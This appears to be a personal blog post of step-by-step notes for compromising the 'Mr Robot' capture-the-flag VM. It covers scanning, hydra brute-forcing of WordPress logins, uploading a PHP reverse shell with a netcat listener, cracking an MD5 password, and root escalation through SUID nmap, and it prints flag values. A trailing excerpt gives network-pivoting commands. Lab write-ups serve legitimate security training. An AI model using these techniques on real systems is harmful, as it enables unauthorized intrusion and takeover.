Skip to main content

VM 4 - MR Robot

VM 4 - MR Robot

============ steps to follow ======================

netdiscover -r 192.168.239.133/24
nmap -sS -AT4 192.168.239.133   /OS and apps
nmap -sS -O -A -n 192.168.239.133
nikto -host 192.168.239.133     / Find apache details
enum4linux 192.168.239.133 / get more details
dirb http://192.168.239.133 / search the web server
192.168.239.133/robots.txt

got a dictionary
wc -l fsociety.dic /Dictionary count 858160 fsocity.dic

cat fsociety.dic | sort -u | wc -l
cat fsocity.dic | sort -u | uniq > newfsocity.dic  / make a unique directory

--------------------------------------------------
bruteforce the wp-login.php using that wordlist  |
--------------------------------------------------
hydra -L newfsocity.dic -p whocares 192.168.239.133 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^:invalid"

/ -p for password (anything can be given)


wpscan --url http://192.168.239.133/ --wordlist /root/Desktop/Pentest/newfsocity.dic --username  Elliot

password: ER28-0652

Download the shell and upload it to wordpress plugin
http://pentestmonkey.net/tools/web-shells/php-reverse-shell

nc -v -n -l -p 4444 / in terminal

cd /home
c3fcd3d76192e4007dfb496cca67e13b --> md5 hash
abcdefghijklmnopqrstuvwxyz --> decrypted

python -c 'import pty; pty.spawn("/bin/bash")'

su robot
abcdefghijklmnopqrstuvwxyz
cd /home
cd /robot

key-2-of-3.txt -- >822c73956184f694993bede3eb39f959

ls -alh / shows all privilages

find / -name key-3-of-3.txt /find a file; permission denbued''

find / -perm -4000 -type f 2>/dev/null

found: /usr/local/bin/nmap --> this requires root access to work..

nmap --help
nmap --interactive
!sh /get get shell access by typing "!" in nmap interactive session
whoami /root
cd root
ls
key-3-of-3.txt
cat key-3-of-3.txt




Comments

Popular posts from this blog

Pivoting into an internal network behind firewall

    Accessing a Victim network from Windows box which is pivoted to Kali #On Kali sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24 or ./chisel server --port 9001 -reverse #On Victim ./chisel.exe client 10.10.10.1:9001 R:0.0.0.0:1080:socks .\chisel.exe client 10.10.10.1:9001 R:8080:127.0.0.1:8080 R:8888:127.0.0.1:8888 R:9090:127.0.0.1:9090 #On windows route print #delete default route route delete 0.0.0.0 #add a new route to kali- setting kali ip as gateway; kali_ip=which is on the same subnet as the windows box route add 0.0.0.0 mask 0.0.0.0 KALI_IP #Now you should be able to access all the sites which are accessible on kali from windows box. #If the above doesnt work #asuming Kali and windows are on Eht0 #add a firewall rule to allow Kali ip traffic netsh advfirewall firewall add rule name="Allow VPN Traffic" dir=in action=allow protocol=any remoteip=KALI_ETH0_IP #on Kali - Allow tun0 traffic to forward on iptables sudo iptables -P FORWARD ACCEPT ...